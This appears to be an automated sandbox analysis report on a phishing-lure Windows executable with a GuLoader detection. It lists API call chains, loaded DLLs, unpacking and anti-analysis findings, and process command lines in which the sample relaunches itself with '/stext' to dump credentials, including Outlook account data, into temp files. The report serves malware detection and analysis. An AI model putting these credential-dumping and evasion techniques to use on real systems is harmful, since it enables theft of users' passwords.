          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_0043DA094_2_0043DA09
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_00438D5E4_2_00438D5E
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_00449ED04_2_00449ED0
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_0041FE834_2_0041FE83
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_00430F544_2_00430F54
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 5_2_004050C25_2_004050C2
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 5_2_004014AB5_2_004014AB
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 5_2_004051335_2_00405133
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 5_2_004051A45_2_004051A4
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 5_2_004012465_2_00401246
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 5_2_0040CA465_2_0040CA46
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 5_2_004052355_2_00405235
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 5_2_004032C85_2_004032C8
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 5_2_004222D95_2_004222D9
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 5_2_004016895_2_00401689
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 5_2_00402F605_2_00402F60
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: String function: 004169A7 appears 86 times
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: String function: 0044DB70 appears 41 times
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: String function: 004165FF appears 35 times
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: String function: 00422297 appears 42 times
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: String function: 00444B5A appears 37 times
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: String function: 00413025 appears 79 times
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: String function: 00416760 appears 69 times
          Source: Nutzen_Unterschrift_Planen#2024.com.exe, 00000000.00000000.316597226950.00000000007E3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebirky festivalfolket.exev+ vs Nutzen_Unterschrift_Planen#2024.com.exe
          Source: Nutzen_Unterschrift_Planen#2024.com.exe, 00000002.00000002.321688063837.00000000007E3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebirky festivalfolket.exev+ vs Nutzen_Unterschrift_Planen#2024.com.exe
          Source: Nutzen_Unterschrift_Planen#2024.com.exe, 00000002.00000003.316868127116.0000000036921000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Nutzen_Unterschrift_Planen#2024.com.exe
          Source: Nutzen_Unterschrift_Planen#2024.com.exe, 00000002.00000003.316870383333.000000000610B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Nutzen_Unterschrift_Planen#2024.com.exe
          Source: Nutzen_Unterschrift_Planen#2024.com.exe, 00000002.00000003.316904156603.000000000612A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Nutzen_Unterschrift_Planen#2024.com.exe
          Source: Nutzen_Unterschrift_Planen#2024.com.exe, 00000002.00000002.321711266597.0000000036F5B000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Nutzen_Unterschrift_Planen#2024.com.exe
          Source: Nutzen_Unterschrift_Planen#2024.com.exeBinary or memory string: OriginalFileName vs Nutzen_Unterschrift_Planen#2024.com.exe
          Source: Nutzen_Unterschrift_Planen#2024.com.exeBinary or memory string: OriginalFilename vs Nutzen_Unterschrift_Planen#2024.com.exe
          Source: Nutzen_Unterschrift_Planen#2024.com.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@9/14@1/2
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,3_2_004182CE
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 0_2_00403350 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403350
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 5_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,5_2_00410DE1
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,3_2_00418758
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,3_2_00413D4C
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,3_2_0040B58D
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeFile created: C:\Users\user\classroomsJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-I617OK
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeFile created: C:\Users\user\AppData\Local\Temp\nsbB8D7.tmpJump to behavior
          Source: Nutzen_Unterschrift_Planen#2024.com.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSystem information queried: HandleInformationJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: Nutzen_Unterschrift_Planen#2024.com.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
          Source: Nutzen_Unterschrift_Planen#2024.com.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
          Source: Nutzen_Unterschrift_Planen#2024.com.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
          Source: Nutzen_Unterschrift_Planen#2024.com.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
          Source: Nutzen_Unterschrift_Planen#2024.com.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
          Source: Nutzen_Unterschrift_Planen#2024.com.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
          Source: Nutzen_Unterschrift_Planen#2024.com.exeReversingLabs: Detection: 26%
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeFile read: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_4-33207
          Source: unknownProcess created: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe "C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe"
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess created: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe "C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe"
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess created: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe /stext "C:\Users\user\AppData\Local\Temp\ubmgcrsfyvpwitpwpupfvcprqao"
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess created: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe /stext "C:\Users\user\AppData\Local\Temp\fdszcjcgmdhbszdagejyggbiyhyoajw"
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess created: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe /stext "C:\Users\user\AppData\Local\Temp\pxxsdbnaalzgvfzeppwajtwrhnqxtundeo"
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess created: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe "C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess created: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe /stext "C:\Users\user\AppData\Local\Temp\ubmgcrsfyvpwitpwpupfvcprqao"Jump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess created: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe /stext "C:\Users\user\AppData\Local\Temp\fdszcjcgmdhbszdagejyggbiyhyoajw"Jump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess created: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe /stext "C:\Users\user\AppData\Local\Temp\pxxsdbnaalzgvfzeppwajtwrhnqxtundeo"Jump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: rstrtmgr.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: pstorec.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: vaultcli.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: pstorec.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeFile written: C:\Users\user\AppData\Local\Temp\tmc.iniJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeFile opened: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.cfgJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
          Source: Nutzen_Unterschrift_Planen#2024.com.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Data Obfuscation

          barindex
          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeUnpacked PE file: 3.2.Nutzen_Unterschrift_Planen#2024.com.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeUnpacked PE file: 4.2.Nutzen_Unterschrift_Planen#2024.com.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeUnpacked PE file: 5.2.Nutzen_Unterschrift_Planen#2024.com.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
          Yara detected GuLoader
          Source: Yara matchFile source: 00000000.00000002.316846928075.0000000007E80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 2_2_36F72806 push ecx; ret 2_2_36F72819
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_0044693D push ecx; ret 3_2_0044694D
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_0044DB70 push eax; ret 3_2_0044DB84
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_0044DB70 push eax; ret 3_2_0044DBAC
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_00451D54 push eax; ret 3_2_00451D61
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_0044B090 push eax; ret 4_2_0044B0A4
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_0044B090 push eax; ret 4_2_0044B0CC
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_00451D34 push eax; ret 4_2_00451D41
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_00444E71 push ecx; ret 4_2_00444E81
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 5_2_00414060 push eax; ret 5_2_00414074
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 5_2_00414060 push eax; ret 5_2_0041409C
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 5_2_00414039 push ecx; ret 5_2_00414049
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 5_2_004164EB push 0000006Ah; retf 5_2_004165C4
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 5_2_00416553 push 0000006Ah; retf 5_2_004165C4
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 5_2_00416555 push 0000006Ah; retf 5_2_004165C4
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeFile created: C:\Users\user\AppData\Local\Temp\nsuC1C1.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_004047CB
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Switches to a custom stack to bypass stack traces
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeAPI/Special instruction interceptor: Address: 885C3D2
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeAPI/Special instruction interceptor: Address: 577C3D2
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,3_2_0040DD85
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeWindow / User API: threadDelayed 3909Jump to behavior
